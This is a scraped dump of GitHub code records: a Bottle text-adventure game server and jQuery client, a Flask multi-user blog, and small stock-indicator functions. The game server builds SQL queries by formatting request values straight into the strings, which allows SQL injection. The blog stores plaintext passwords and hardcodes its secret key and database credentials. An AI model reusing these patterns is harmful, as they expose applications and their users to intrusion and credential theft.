cursor.fetchone()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\ndef get_question_text(question_id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT question_text FROM question WHERE question_id = '{0}'\".format(question_id)\n cursor.execute(sql)\n return cursor.fetchone()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\ndef get_answers_for_question(question_id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT qa.answer_id, answer_text \" \\\n \"FROM q_a_link qa \" \\\n \"LEFT JOIN answer a \" \\\n \"ON qa.answer_id = a.answer_id \" \\\n \"WHERE qa.question_id = '{0}'\".format(question_id)\n cursor.execute(sql)\n return cursor.fetchall()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\ndef get_question_image(question_id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT image FROM question WHERE question_id = '{0}'\".format(question_id)\n cursor.execute(sql)\n return cursor.fetchone()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\n@route(\"/printQuestion\", method=\"POST\")\ndef print_question():\n username = request.POST.get(\"username\")\n\n user = get_user(username)\n # only get next question for user if it exists\n if user[\"curr_question\"] != -1:\n question_text = get_question_text(user[\"curr_question\"])\n image_src = get_question_image(user[\"curr_question\"])\n answer_list = get_answers_for_question(user[\"curr_question\"])\n return json.dumps({\"question_text\": question_text[\"question_text\"],\n \"answers\": answer_list,\n \"image\": image_src[\"image\"],\n \"end_reached\": 0,\n \"coins\": user[\"user_coins\"],\n \"life\": user[\"user_life\"]\n })\n else:\n # end has been reached\n user = get_user(username)\n return json.dumps({\"end_reached\": 1,\n \"user\": user})\n\n\ndef get_answer_data(answer_id):\n try:\n with connection.cursor() as cursor:\n sql = \"SELECT * FROM answer WHERE answer_id = '{0}'\".format(answer_id)\n cursor.execute(sql)\n return cursor.fetchone()\n except Exception as e:\n print(\"Failed because of \" + repr(e))\n\n\ndef update_user_coins(username, coins_to_deduct):\n user = get_user(username)\n new_coin_amt = max(int(user[\"user_coins\"]) - int(coins_to_deduct), 0)\n try:\n with connection.cursor() as cursor:\n sql = \"UPDATE user SET user_coins='{0}' WHERE user_name = '{1}'\".format(new_coin_amt, username)\n cursor.execute(sql)\n connection.commit()\n except Exception as e:\n print(\"you failed because of \" + repr(e))\n return None\n\n\ndef update_user_life(username, life_to_deduct):\n user = get_user(username)\n new_life_amt = max(min(int(user[\"user_life\"]) - int(life_to_deduct), 100), 0) # restrict between 0 and 100 percent\n try:\n with connection.cursor() as cursor:\n sql = \"UPDATE user SET user_life ='{0}' WHERE user_name = '{1}'\".format(new_life_amt, username)\n cursor.execute(sql)\n connection.commit()\n except Exception as e:\n print(\"you failed because of \" + repr(e))\n return None\n\n\ndef update_user_curr_question(username, new_curr_question):\n try:\n with connection.cursor() as cursor:\n sql = \"UPDATE user SET curr_question ='{0}' WHERE user_name = '{1}'\".format(new_curr_question, username)\n cursor.execute(sql)\n connection.commit()\n except Exception as e:\n print(\"you failed because of \" + repr(e))\n return None\n\n\ndef update_user_data(username, answer_data):\n update_user_coins(username, answer_data[\"answer_coins\"])\n update_user_life(username, answer_data[\"answer_life\"])\n update_user_curr_question(username, answer_data[\"next_question_id\"])\n\n\n@route(\"/handleOptionSelection\", method=\"POST\")\ndef handle_option_selection():\n username = request.POST.get(\"username\")\n answer_id = request.POST.get(\"choice\")\n\n answer_data = get_answer_data(answer_id)\n update_user_data(username, answer_data)\n user = get_user(username)\n return json.dumps({\"user\": user})\n\n\n@route(\"/setDetailsForLoser\", method=\"POST\")\ndef set_details_for_loser():\n username = request.POST.get(\"username\")\n update_user_coins(username, 999) # make it that he loses more coins than he could possibly have\n update_user_life(username, 100)\n update_user_curr_question(username, -1)\n\n\n@route('/js/<filename:re:.*\\.js$>', method='GET')\ndef javascripts(filename):\n return static_file(filename, root='js')\n\n\n@route('/css/<filename:re:.*\\.css>', method='GET')\ndef stylesheets(filename):\n return static_file(filename, root='css')\n\n\n@route('/images/<filename:re:.*\\.(jpg|png|gif|ico)>', method='GET')\ndef images(filename):\n return static_file(filename, root='images')\n\n\ndef main():\n # if os.environ.get('APP_LOCATION') == 'heroku':\n # run(host=\"0.0.0.0\", port=int(os.environ.get(\"PORT\", 5000)))\n # else:\n run(host='localhost', port=8080, debug=True)\n add_user()\n\n\nif __name__ == '__main__':\n main()\n\n"
},
{
"alpha_fraction": 0.5694444179534912,
"alphanum_fraction": 0.5703807473182678,
"avg_line_length": 34.010929107666016,
"blob_id": "d89639b3392073cee20ed0c5a9ad97e6faf25fa8",
"content_id": "89489693fbed482e6e59dbbda047a01a1e7c7cde",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "JavaScript",
"length_bytes": 6408,
"license_type": "no_license",
"max_line_length": 186,
"num_lines": 183,
"path": "/js/adventure.js",
"repo_name": "HaymanLiron/adventure",
"src_encoding": "UTF-8",
"text": "var Adventures = {};\nAdventures.currentUser = \"\";\n\n//TODO: remove for production\nAdventures.debugMode = true;\nAdventures.DEFAULT_IMG = \"./images/choice.jpg\";\n\n//Setting the relevant image according to the server response\nAdventures.setImage = function (img_name) {\n $(\"#situation-image\").attr(\"src\", \"./images/\" + img_name);\n};\n\nAdventures.printFinalOutcome = function (data) {\n $(\".adventure\").hide();\n $(\".welcome-screen\").hide(); //defensive in case user had logged in after dying\n $(\".final-screen\").show();\n if (data[\"user\"][\"user_coins\"] > 0 && data[\"user\"][\"user_life\"] > 50){\n $(\".final-message\").text(\"Congratulations, you managed to fight off the monster and survive!\");\n } else {\n $(\".final-message\").text(\"You did not succeed in defeating the monster! Bye-bye!\");\n // in case the player died before the final question, set the user details appropriately\n $.ajax(\"/setDetailsForLoser\", {\n type: \"POST\",\n data: {\n \"username\": Adventures.currentUser\n },\n dataType: \"json\",\n contentType: \"application/json\"\n })\n }\n};\n\nAdventures.chooseOption = function () {\n $.ajax(\"/handleOptionSelection\", {\n type: \"POST\",\n data: {\n \"username\": Adventures.currentUser,\n \"choice\": $(this).attr(\"value\")\n }, \n dataType: \"json\",\n contentType: \"application/json\",\n success: function (data) {\n $(\".greeting-text\").hide();\n // check if user has life\n if (data[\"user\"][\"user_life\"] <= 0) { // the player died!\n Adventures.printFinalOutcome(data); \n }\n Adventures.getNextQuestion();\n }\n });\n};\n\nAdventures.write = function (message) {\n //Writing new choices and image to screen\n console.log(message);\n $(\".situation-text\").text(message['question_text']).show();\n for (var i = 0; i < message['answers'].length; i++) {\n var opt = $('#option_' + (i + 1));\n opt.text(message['answers'][i]['answer_text']);\n opt.prop(\"value\", message['answers'][i]['answer_id']); \n }\n $(\".coins-and-lives\").text(\"You have \" + message[\"coins\"] + \" coins and \" + message[\"life\"] + \" percentage life!\").show();\n Adventures.setImage(message['image']);\n};\n\nAdventures.getNextQuestion = function () {\n //only gets data for next question, does NOT handle choice selection\n $.ajax(\"/printQuestion\", {\n type: \"POST\",\n data: {\"username\": Adventures.currentUser},\n dataType: \"json\",\n contentType: \"application/json\",\n success: function (data) {\n if (!(data[\"end_reached\"])){\n $(\".greeting-text\").hide();\n $(\".adventure\").show();\n $(\".welcome-screen\").hide();\n Adventures.write(data);\n } else {\n // we have reached the end!\n Adventures.printFinalOutcome(data);\n }\n }\n });\n};\n\nAdventures.makeNewUser = function () {\n $.ajax(\"/addUser\", {\n type: \"POST\",\n data: {\n \"username\": $(\"#nameField\").val()\n },\n dataType: \"json\",\n contentType: \"application/json\",\n success: function (data) {\n console.log(\"This worked!\");\n }\n })\n};\n\nAdventures.validateUsernameInput = function () {\n $.ajax(\"/checkUserCredentials\", {\n type: \"POST\",\n data: {\n \"username\": $(\"#nameField\").val()\n },\n dataType: \"json\",\n contentType: \"application/json\",\n success: function (data) {\n if (data[\"already_exists\"]) {\n // user already exists!\n console.log(\"user exists\");\n Adventures.currentUser = $(\"#nameField\").val();\n Adventures.getNextQuestion();\n } else {\n console.log(\"user does not exist\");\n Adventures.currentUser = $(\"#nameField\").val();\n Adventures.makeNewUser();\n Adventures.getNextQuestion();\n }\n }\n });\n};\n\nAdventures.initAdventure = function () {\n //username typed their name in the screen and clicked on the adventure\n var name = $(\"#nameField\").val();\n if (name !== undefined && name !== null && name !== \"\") {\n Adventures.validateUsernameInput();\n }\n};\n\nAdventures.checkName = function () {\n if ($(this).val() !== undefined && $(this).val() !== null && $(this).val() !== \"\") {\n $(\".adventure-option\").prop(\"disabled\", false);\n }\n else {\n $(\".adventure-option\").prop(\"disabled\", true);\n }\n};\n\nAdventures.start = function () {\n $(document).ready(function () {\n $(\".game-option\").click(Adventures.chooseOption); //this sets up the event listener for when a player will click an option which is in response to a question during the adventure\n $(\"#nameField\").keyup(Adventures.checkName); //this validates the player's input for his username when starting the game\n $(\".adventure-option\").click(Adventures.initAdventure); //this sets up a click event listener for when a player selects an adventure at the beginning of the game\n $(\".adventure\").hide();\n $(\".final-screen\").hide();\n $(\".welcome-screen\").show();\n });\n};\n\nAdventures.handleServerError = function (errorThrown) {\n Adventures.debugPrint(\"Server Error: \" + errorThrown);\n var actualError = \"\";\n if (Adventures.debugMode) {\n actualError = \" ( \" + errorThrown + \" ) \";\n }\n Adventures.write(\"Sorry, there seems to be an error on the server. Let's talk later. \" + actualError);\n\n};\n\nAdventures.debugPrint = function (msg) {\n if (Adventures.debugMode) {\n console.log(\"Adventures DEBUG: \" + msg);\n }\n};\n\n//Handle Ajax Error, animation error and speech support\nAdventures.bindErrorHandlers = function () {\n //Handle ajax error, if the server is not found or experienced an error\n $(document).ajaxError(function (event, jqxhr, settings, thrownError) {\n Adventures.handleServerError(thrownError);\n });\n\n //Making sure that we don't receive an animation that does not exist\n $(\"#situation-image\").error(function () {\n Adventures.debugPrint(\"Failed to load img: \" + $(\"#situation-image\").attr(\"src\"));\n Adventures.setImage(Adventures.DEFAULT_IMG);\n });\n};\n\nAdventures.start();\n\n"
}
] | 3 |
skygirlual/blogz | https://github.com/skygirlual/blogz | 5e7816003d89873fb0159bb839d46207f53f2a0c | d93f15b32055afab41a4243d394793494fb966e1 | 54df5097db97d82b1b6aeec5c7b8ead1372d48dc | refs/heads/master | 2021-05-13T14:47:29.450308 | 2018-01-15T07:42:15 | 2018-01-15T07:42:15 | 116,750,349 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5,
"alphanum_fraction": 0.5193049907684326,
"avg_line_length": 29.52941131591797,
"blob_id": "13937d12fcf5be8b253fabe0637aa722d1cba574",
"content_id": "d2890939ba7a2e8329ac901560c67d2dbe9845fb",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "HTML",
"length_bytes": 518,
"license_type": "no_license",
"max_line_length": 109,
"num_lines": 17,
"path": "/templates/newpost.html",
"repo_name": "skygirlual/blogz",
"src_encoding": "UTF-8",
"text": "{% extends \"base.html\" %}\n\n{% block content %}\n <h1>Create A New Blog Post!</h1>\n <form method='POST'>\n <label>\n New Post Title:<br>\n <input type=\"text\" name='title' value=\"{{title}}\" minlength=1 maxlength=120 />\n <br><br>\n New Post Body:<br>\n <textArea input type=\"text\" name='body' value=\"{{body}}\" minlength=1 maxlength=520 /></textArea>\n </label><br>\n <input type=\"submit\" value='Add Post' />\n </form>\n <hr />\n\n{% endblock %}"
},
{
"alpha_fraction": 0.5935308337211609,
"alphanum_fraction": 0.6008301377296448,
"avg_line_length": 35.390625,
"blob_id": "91829fb2be6d7bf2b8197626e0f874ff5626ce54",
"content_id": "194b5c3808092abe12c3202010d26ea34f4131c3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 6987,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 192,
"path": "/main.py",
"repo_name": "skygirlual/blogz",
"src_encoding": "UTF-8",
"text": "from flask import Flask, request, redirect, render_template, session, flash\nfrom flask_sqlalchemy import SQLAlchemy\n\napp = Flask(__name__)\napp.config['DEBUG'] = True\napp.config['SQLALCHEMY_DATABASE_URI'] = 'mysql+pymysql://blogz:password@localhost:3306/blogz'\napp.config['SQLALCHEMY_ECHO'] = True\ndb = SQLAlchemy(app)\napp.secret_key = 'T7lX@a$OxTVaC4pkqu'\n\nclass Blog(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n title = db.Column(db.String(120))\n body = db.Column(db.String(510))\n owner_id = db.Column(db.Integer, db.ForeignKey('user.id'))\n \n def __init__(self, title, body, owner):\n self.title = title\n self.body = body\n self.owner = owner\n\nclass User(db.Model):\n\n id = db.Column(db.Integer, primary_key=True)\n email = db.Column(db.String(120), unique=True)\n password = db.Column(db.String(20))\n blogs = db.relationship('Blog', backref='owner')\n \n def __init__(self, email, password):\n self.email = email\n self.password = password\n\[email protected]_request\ndef require_login():\n allowed_routes = ['register', 'login']\n if request.endpoint not in allowed_routes and 'email' not in session:\n return redirect('/login')\n\[email protected]('/register', methods=['POST', 'GET'])\[email protected]('/signup', methods=['POST', 'GET'])\ndef register():\n if request.method == 'POST':\n email = request.form['email']\n password = request.form['password']\n verify = request.form['verify']\n\n # validation *\n email_error = \"\"\n password_error = \"\"\n verify_error = \"\"\n error_count=0\n\n #email paramaters \n if email == \"\":\n email_error = \"email address not entered \"\n error_count=error_count+1\n\n if \"@\" not in email and len(email) !=0:\n email_error = \"email must contain 1 @ symbol \"\n error_count=error_count+1\n\n if \".\" not in email and len(email) !=0:\n email_error = \"email must contain exactly 1 . symbol \"\n error_count=error_count+1\n\n if \" \" in email and len(email) !=0:\n email_error = \"email must not contain any spaces \"\n error_count=error_count+1\n\n if ((len(email) < 3 or len(email) > 20) and len(email) !=0):\n email_error = \"email must contain 3 to 20 characters \"\n error_count=error_count+1\n\n if len(password) < 3 or len(password) > 20 or \" \" in password:\n password_error = \"Password must contain 3 to 20 characters and no spaces \"\n error_count=error_count+1\n\n if password != verify:\n verify_error = \"Passwords do not match\"\n error_count=error_count+1\n \n login_errors=(email_error, password_error, verify_error)\n if error_count>0:\n for error in login_errors:\n if error != \"\":\n flash(error, 'error')\n return render_template('register.html', email= email, password= password, verify = verify)\n \n # creating new user account.\n existing_user = User.query.filter_by(email=email).first()\n if not existing_user:\n new_user =User(email, password)\n db.session.add(new_user)\n db.session.commit()\n session['email'] = email\n return redirect('/newpost')\n else:\n flash('Duplicate User. - you must use a unique email.', 'error')\n return render_template('register.html')\n else:\n return render_template('register.html')\n\[email protected]('/login', methods=['POST', 'GET'])\ndef login():\n if request.method =='POST':\n email = request.form['email']\n password = request.form['password']\n user = User.query.filter_by(email=email).first()\n if user==None:\n flash('Login Errror - Invalid or Unregistered email address', 'error')\n return render_template('/login.html', email=email)\n if user.password != password:\n flash('Login Errror - Password Incorrect', 'error')\n return render_template('/login.html', email=email)\n if user and user.password == password:\n session['email'] = email\n flash('Logged In', 'normal')\n return redirect('/newpost')\n return render_template('login.html')\n\[email protected]('/logout')\ndef logout():\n del session['email']\n flash('You have been logged out', 'normal')\n return redirect('/login')\n\[email protected]('/')\[email protected]('/index/')\ndef index():\n return redirect ('/blog')\n\[email protected]('/home/')\ndef home():\n #sort by email, convert to username in html.\n authors = User.query.order_by(User.email).all()\n return render_template('home.html', authors=authors)\n\[email protected]('/blog/', methods=['POST', 'GET'])\ndef show_all_blog_posts():\n allPosts = db.session.query(Blog).order_by(Blog.id.desc()).all()\n return render_template('blogposts.html',title=\"My Fantastic Blog\", posts=allPosts)\n\[email protected]('/post/<int:post_id>/')\ndef show_post(post_id):\n onePost = Blog.query.filter_by(id=post_id).first()\n #validate post id is valid using query results\n # this fixes nav buttons out of range \n if onePost == None:\n return redirect ('/blog')\n return render_template('post.html', posts=onePost, post_id=post_id)\n\[email protected]('/singleUser/<int:user_id>/')\ndef show_users_posts(user_id):\n # validates user_id is in valid range\n if User.query.filter_by(id=user_id).first() == None:\n return redirect ('/blog')\n user_name = User.query.filter(User.id==user_id).first().email.split(sep='@')[0]\n user_Posts = Blog.query.order_by(Blog.id.desc()).filter(Blog.owner_id==user_id).all()\n return render_template('singleUser.html', posts=user_Posts, user_name=user_name)\n\[email protected]('/singleUser/')\ndef show_my_posts():\n user_id = User.query.filter_by(email=session['email']).first()\n return redirect('/singleUser/%s' % user_id.id)\n\[email protected]('/newpost/', methods=['POST', 'GET'])\ndef new_user_post():\n if request.method == 'POST':\n post_title = request.form['title']\n post_body = request.form['body']\n post_owner = User.query.filter_by(email=session['email']).first()\n\n # input validation\n if len(post_title) < 1 or len(post_title) > 120:\n flash('You forgot to enter a title.', 'error')\n return render_template('newpost.html', post_body=post_body)\n if len(post_body) < 1 or len(post_body) > 520:\n flash('You forgot to enter the body.', 'error')\n return render_template('newpost.html', post_title=post_title)\n\n new_post = Blog(post_title, post_body, post_owner)\n db.session.add(new_post)\n db.session.commit()\n new_post_id = new_post.id\n flash('Your new post has been posted.', 'normal')\n return redirect('/post/%s' % new_post_id)\n else:\n return render_template('newpost.html')\n\nif __name__ == '__main__':\n app.run()\n"
}
] | 2 |
SALBERINO/indicadores_tecnicos | https://github.com/SALBERINO/indicadores_tecnicos | 964b10a42acf4034cd38ef9321ad63943eed2503 | 076121e1925cbf7c7b9a0dc0528e88adeb80a504 | 1196a4a9751dd294d2ab89f73449629fc308c12d | refs/heads/main | 2023-07-05T06:02:31.308778 | 2021-09-05T01:07:18 | 2021-09-05T01:07:18 | 402,904,284 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6390390396118164,
"alphanum_fraction": 0.6450450420379639,
"avg_line_length": 40.625,
"blob_id": "056c8d2767008c67209d8ab30cc28c849c618c81",
"content_id": "04bafdf551e52ab4d1da30fc3c22335817124f1e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1665,
"license_type": "no_license",
"max_line_length": 286,
"num_lines": 40,
"path": "/indicadores.py",
"repo_name": "SALBERINO/indicadores_tecnicos",
"src_encoding": "UTF-8",
"text": "def devolver_con_percentil(data):\n \"\"\" \n Esta funcion recibe una matriz de datos, que posee la serie historica con los valores encolumnados por\n Open, High, Low, Close\n \"\"\"\n df = data . copy()\n df[\"variacion\"] = df[\"Close\"].pct_change() * 100 \n df.dropna(inplace=True)\n df[\"rank_variacion\"] = df[\"variacion\"].rank()\n df[\"rank_variacion_pct\"] = df[\"variacion\"].rank(pct= True)\n return df\n\ndef indicador_gap_basico(data):\n \"\"\" \n Esta funcion recibe una matriz de datos, que posee la serie historica con los valores encolumnados por\n Open, High, Low, Close\n \"\"\"\n import numpy as np\n df = data.copy()\n df_menosuno = data.copy().shift(1)\n df_menosdos = data.copy().shift(2)\n df_menosuno['tendencia'] = np.where(df_menosuno['Close'] > df_menosdos['Close'],'alsista','bajista')\n df['gap'] = np.where((df_menosuno['tendencia'] == 'alsista') & (df['Open'] > df_menosuno['High']) & (df['Close'] > df['Open']), 'gap alsista', np.where((df_menosuno['tendencia'] == 'bajista)') & (df['Open'] < df_menosuno['Low']) & (df['Close'] < df['Open']),'gap bajista', 'sin gap'))\n return df\n\ndef indicador_tipo_de_vela(data):\n import numpy as np\n \"\"\" \n Esta funcion recibe una matriz de datos, que posee la serie historica con los valores encolumnados por\n Open, High, Low, Close\n \"\"\"\n df = data . copy()\n df[\"vela\"] = np.where(df.Open < df.Close, \"verde\", np.where(df.Open == df.Close, \"doji\", \"roja\"))\n return df\n\ndef devolver_top_n_variacion(data, n=10, es_de_baja=True):\n df = data . copy() \n df[\"variacion\"] = df[\"Close\"].pct_change() * 100 \n df.dropna(inplace=True)\n return df.sort_values(\"variacion\", ascending = es_de_baja ).head(n)\n"
},
{
"alpha_fraction": 0.7535211443901062,
"alphanum_fraction": 0.7605633735656738,
"avg_line_length": 140,
"blob_id": "a64db0039866e218bd9d2304165d70b138323768",
"content_id": "deb77a6109c81aec7ec0699644741adadbc156c5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 143,
"license_type": "no_license",
"max_line_length": 140,
"num_lines": 1,
"path": "/README.md",
"repo_name": "SALBERINO/indicadores_tecnicos",
"src_encoding": "UTF-8",
"text": "Estos indicadores trabajan sobre un dataframe de valores de 1 ticker con los atributos 'Open', 'Close', 'Low' y 'High' en función del tiempo \n"
}
] | 2 |
hdspook/coding | https://github.com/hdspook/coding | 67c44b8a265555207cd89d93376268cf39ed749b | bd7ee7a9d07a8554e056817b4078911b30399d24 | 5291bdc58f2d2a048868875516be885b6613a837 | refs/heads/master | 2020-06-10T15:32:22.812099 | 2019-06-25T08:07:15 | 2019-06-25T08:07:15 | 193,663,176 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.4546762704849243,
"alphanum_fraction": 0.4784172773361206,
"avg_line_length": 27.26530647277832,
"blob_id": "7ea70bf5575dc0aae5ded1d39940b6943c41687d",
"content_id": "4019b64073edc2b6030e1ab1da921ff6f6e9bfc3",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2780,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 98,
"path": "/SegmentTree.py",
"repo_name": "hdspook/coding",
"src_encoding": "UTF-8",
"text": "from math import ceil,log\nINF = 10**5+1\n\nclass SegmentTree:\n global INF\n \n def __init__(self,size,A):\n self.A = A\n self.n = len(A)-1\n self.segt = [0 for _ in range(size)]\n self.lazyt = [0 for _ in range(size)]\n \n def construct(self):\n self.conHelp(self.A,0,self.n,0,self.segt)\n \n def conHelp(self,A,low,high,start,st):\n if low == high:\n st[start] = A[low]\n return A[low]\n \n mid = int((low+high)/2)\n \n st[start] = min(self.conHelp(A,low,mid,2*start+1,st),self.conHelp(A,mid+1,high,2*start+2,st))\n return st[start]\n \n def RMQ(self,start,end):\n return self.RMQuery(self.segt,0,self.n,start,end,0,self.lazyt)\n \n def RMQuery(self,segt,low,high,start,end,node,lazyt):\n \n if low > high:\n return\n \n if lazyt[node] != 0:\n segt[node] += lazyt[node]\n if low != high:\n lazyt[2*node + 1] += lazyt[node]\n lazyt[2*node + 2] += lazyt[node]\n lazyt[node] = 0\n \n if start > high or end < low:\n return INF\n \n if start <= low and end >= high:\n return segt[node]\n \n mid = int((low+high)/2)\n \n return min(self.RMQuery(segt, low, mid, start, end, 2 * node + 1, lazyt),self.RMQuery(segt, mid + 1, high, start, end, 2 * node + 2, lazyt))\n \n def lazyUpdate(self,start,end,val):\n self.lazyHelper(self.segt,self.lazyt,0,self.n,start,end,0,val)\n \n def lazyHelper(self,segt,lazyt,low,high,start,end,node,val):\n \n if low > high:\n return\n \n if lazyt[node] != 0:\n segt[node] += lazyt[node]\n if low != high:\n lazyt[2*node + 1] += lazyt[node]\n lazyt[2*node + 2] += lazyt[node]\n lazyt[node] = 0\n \n if start > high or end < low:\n return INF\n \n if start <= low and end >= high:\n segt[node] += val\n if low != high:\n lazyt[2*node + 1] += val\n lazyt[2*node + 2] += val\n return\n \n mid = int((low+high)/2)\n self.lazyHelper(segt,lazyt,low,mid,start,end,2*node+1,val)\n self.lazyHelper(segt,lazyt,mid+1,high,start,end,2*node+2,val)\n segt[node] = min(segt[2*node + 1],segt[2*node + 2])\n \n def check(self):\n print(self.segt)\n print(self.lazyt)\n \n\ndef main():\n A = [1,2,3,4,5,6]\n n = len(A)\n height = int(ceil(log(n,2)))\n size = 2*2**height - 1\n s = SegmentTree(size,A)\n s.construct()\n s.lazyUpdate(1,4,5)\n s.check()\n print(s.RMQ(1,4))\n \n \nmain()\n \n \n"
}
] | 1 |
heibai01/Qzone_Photo | https://github.com/heibai01/Qzone_Photo | 77c6619f7a097d3714c0e1967cd501b38aa34fb1 | 248ef872270d1dcd2b13659388bdaee6cbcf6552 | 3184599acf1921ea1608283f73b88a486020d7a7 | refs/heads/master | 2021-01-15T17:07:37.854732 | 2016-02-11T07:53:58 | 2016-02-11T07:53:58 | null | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5220588445663452,
"alphanum_fraction": 0.5735294222831726,
"avg_line_length": 12.699999809265137,
"blob_id": "f1ccdf85ff6ee40e0acf630c4886ba12c3a12f9f",
"content_id": "004e2da0f80f7855d8a8b14e80bcf9c139f93498",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 136,
"license_type": "permissive",
"max_line_length": 30,
"num_lines": 10,
"path": "/main.py",
"repo_name": "heibai01/Qzone_Photo",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n__author__ = 'young'\n\nimport untils\n\nqq = 10000\nwhile True:\n untils.savePhotos(str(qq))\n #break\n qq += 1"
},
{
"alpha_fraction": 0.5710923075675964,
"alphanum_fraction": 0.5814501047134399,
"avg_line_length": 30.25,
"blob_id": "280401d655f49a89c2b0ba89cfa1eab9a1312636",
"content_id": "246af03d49bfddc258cde3372caedbcec905faf6",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2190,
"license_type": "permissive",
"max_line_length": 83,
"num_lines": 68,
"path": "/untils.py",
"repo_name": "heibai01/Qzone_Photo",
"src_encoding": "UTF-8",
"text": "# -*- coding:utf-8 -*-\n__author__ = 'young'\n\nimport json\nimport urllib2\nimport os\n\nimport Entity\n\n\ndef getAblums(qq, url):\n ablums = list()\n print url + qq + \"&outstyle=2\"\n request = urllib2.Request(url + qq + \"&outstyle=2\")\n f = urllib2.urlopen(request, timeout=10)\n response = f.read().decode('gbk')\n f.close()\n response = response.replace('_Callback(', '')\n response = response.replace(');', '')\n #print response\n if 'album' in json.loads(response):\n for i in json.loads(response)['album']:\n ablums.append(Entity.Album(i['id'], i['name'], i['total']))\n return ablums\n\n\ndef getPhotosByAlum(album, qq, url):\n photos = list()\n print url + qq + \"&albumid=\" + album.ID + \"&outstyle=json\"\n request = urllib2.Request(url + qq + \"&albumid=\" + album.ID + \"&outstyle=json\")\n f = urllib2.urlopen(request, timeout=10)\n response = f.read().decode('gbk')\n f.close()\n response = response.replace('_Callback(', '')\n response = response.replace(');', '')\n #print response\n if 'pic' in json.loads(response):\n for i in json.loads(response)['pic']:\n photos.append(Entity.Photo(i['url'], i['name'], album))\n return photos\n\n\ndef saveImage(path, photo, qq, index):\n print index, photo.URL\n url = photo.URL.replace('\\\\', '')\n f = urllib2.urlopen(url, timeout=10)\n data = f.read()\n f.close()\n if not os.path.exists(path+os.path.sep+qq):\n os.mkdir(path+os.path.sep+qq)\n with open(path+os.path.sep+qq+os.path.sep + index + '.jpeg', \"wb\") as code:\n code.write(data)\n code.close()\n\n\ndef savePhotos(qq, path=Entity.savepath):\n print u'获取:'+qq+u'的相册信息'\n ablums = getAblums(qq, Entity.albumbase1)\n if len(ablums) > 0:\n for i, a in enumerate(ablums):\n if a.Count > 0:\n print u'开始下载第'+str(i+1)+u'个相册'\n photos = getPhotosByAlum(a, qq, Entity.photobase1)\n for index, p in enumerate(photos):\n saveImage(path, p, qq, str(i)+'_'+str(index))\n print u'第'+str(i+1)+u'个相册下载完成'\n else:\n print u'读取到得相册个数为0'"
}
] | 2 |
Shiv359/InsertionSort | https://github.com/Shiv359/InsertionSort | 3c615e3133d9f2f9bc36f6b2d4b068494bf23913 | 0b03254e6248d76e6fca389b19329ba4aae3f780 | 08bca3ebf53e6fd3e079189c481aa62c60d6e58c | refs/heads/main | 2023-02-10T10:02:58.105354 | 2021-01-07T15:57:26 | 2021-01-07T15:57:26 | 327,658,624 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.5245283246040344,
"alphanum_fraction": 0.6188679337501526,
"avg_line_length": 22.272727966308594,
"blob_id": "439543d109341475170e4b0cf74a9fb2a98c1680",
"content_id": "c999ce7f7d5ae75a4caab4b4ed8c1431834f385f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 265,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 11,
"path": "/InsertionSort.py",
"repo_name": "Shiv359/InsertionSort",
"src_encoding": "UTF-8",
"text": "def Insertion_Sort(list1):\r\n\tfor i in range(1,len(list1)):\r\n\t\tvalue=list1[i]\r\n\t\tj=i-1\r\n\t\twhile j>=0 and value<list1[j]:\r\n\t\t\tlist1[j+1]=list1[j]\r\n\t\t\tj=j-1\r\n\t\t\tlist1[j+1]=value\r\n\treturn list1\r\nlist2=[10,5,13,8,2, 0,-1]\r\nprint('Sorted list is: ',Insertion_Sort(list2))"
}
] | 1 |
lakshaygpt28/Go4Hack | https://github.com/lakshaygpt28/Go4Hack | 2ec5e116b7f0688e69fd55b4b680ca719429008c | dea629e7f6faa83f828c6d548dba794e46ad6d0b | 15e80efeed03c81fe9a22d60d83374e4024f6f9e | refs/heads/master | 2021-05-08T14:04:06.206815 | 2018-02-04T11:20:24 | 2018-02-04T11:20:24 | 120,065,580 | 0 | 1 | null | 2018-02-03T06:23:33 | 2018-02-03T06:23:34 | 2018-10-06T09:57:05 | Python | [
{
"alpha_fraction": 0.7027027010917664,
"alphanum_fraction": 0.7432432174682617,
"avg_line_length": 23.66666603088379,
"blob_id": "66d5c0ee065cc4575095778804a428ee0611c8d7",
"content_id": "d7411edb09dbb81ff33094331a3c93e8db7ffd60",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 74,
"license_type": "no_license",
"max_line_length": 46,
"num_lines": 3,
"path": "/README.md",
"repo_name": "lakshaygpt28/Go4Hack",
"src_encoding": "UTF-8",
"text": "# Go4Hack\n# Save The World\nA game made during Hack 2.0 conducted at NITH.\n"
},
{
"alpha_fraction": 0.5673440098762512,
"alphanum_fraction": 0.5855062007904053,
"avg_line_length": 32.5,
"blob_id": "1425fc4c24e0f3f35f7c2bea4e538002cba01ff9",
"content_id": "b8e3e6d644c5de32b10cb759105371ce8d3f0dfe",
"detected_licenses": [],
"is_generated": false,
